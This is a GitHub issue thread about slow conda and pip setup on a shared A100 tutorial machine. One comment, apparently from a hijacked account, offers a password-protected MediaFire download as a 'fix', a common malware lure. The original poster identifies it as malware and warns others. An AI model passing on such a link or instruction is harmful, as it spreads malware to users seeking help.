### ISSUE TITLE
Conda environment and downloading pip packages (torch) is slow on 10% A100

### ISSUE THREAD

**Issue by realharryhero** [InternLM/tutorial#1781]
Hello,

In 1.2. 基础关卡, 第 2 关 (the demo which gives 30% A100 computing access), it takes a very long time to set up the "demo" conda environment (approximately 5 minutes); when I install a pip package it similarly takes a long time. 

If creating the demo conda environment takes time due to the small amount of CPU resources in the virtual machine, maybe it would be a good idea to do either or both of two things:

1. Tell learners in advance to partition some of their time specifically to only download the conda environment and LLM, or
2. Create the demo conda environment on all the 10% A100 machines (which should be possible as the download size is ~5 GB, while the total memory available to users is ~40 GB.)

Do you think this a good idea? Thank you very much!

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by realharryhero** [comment]
Thank you! But which previous issue does this fix come from? How does the fix work? (not to be rude, but how do I know the fix isn't malware, since anyone can theoretically publish to mediafire? just to make sure, very sorry)

**Comment by realharryhero** [comment]
yep, it's malware. they deleted the comment; also note that it was confusing what the fix was (mediafire? password "changeme"? why would it have anything to do with gcc?), and it was a user who posted very sporadically. It seems they did have some mildly sane comments before this one, so it's probably an account that was taken over. 

So be careful out there! Yay for 2FA (2-Factor Authentication)!
